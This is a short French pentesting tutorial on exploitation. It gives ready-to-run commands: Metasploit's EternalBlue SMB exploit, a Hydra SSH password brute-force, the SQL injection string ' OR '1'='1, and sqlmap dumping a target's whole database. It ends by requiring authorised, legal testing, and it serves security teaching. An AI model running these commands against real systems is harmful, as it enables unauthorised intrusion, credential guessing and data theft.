Exploiter les failles d'un système
Objectif
Comprendre et appliquer les méthodes d'exploitation d’un système à partir des vulnérabilités identifiées lors de la phase de scan ou de reconnaissance.
Prérequis
-
Connaissance des bases du pentesting
-
Accès à un environnement de test (lab ou machine virtuelle)
-
Connaissance des outils : Metasploit, Hydra, SQLMap
1. Exploitation des services vulnérables
Utiliser Metasploit pour exploiter une faille connue
msfconsole
search exploit windows/smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.X.X
exploit
Cette commande tente d'exploiter la faille SMB d’EternalBlue sur la machine ciblée.
2. Bruteforce des accès
Exemple avec SSH et Hydra
hydra -l admin -P passwords.txt ssh://192.168.X.X
Hydra teste les mots de passe listés dans passwords.txt
pour l’utilisateur admin
.
3. Exploitation d'une faille SQL (SQL Injection)
Test manuel dans un champ de formulaire
' OR '1'='1
Ce test permet de contourner un champ d'authentification vulnérable.
Exploitation automatique avec SQLMap
sqlmap -u "http://target.com/login.php?id=1" --dump-all
Cette commande tente d'extraire toutes les données disponibles dans la base cible.
Outils utilisés
-
Metasploit : framework d’exploitation
-
Hydra : outil de bruteforce multi-protocoles
-
SQLMap : outil d’automatisation des injections SQL
Conclusion
L’exploitation est une étape clé du pentesting permettant de valider la présence effective de vulnérabilités et d’évaluer leur impact. Elle doit toujours être réalisée dans un cadre éthique et légal, avec autorisation explicite du propriétaire du système testé.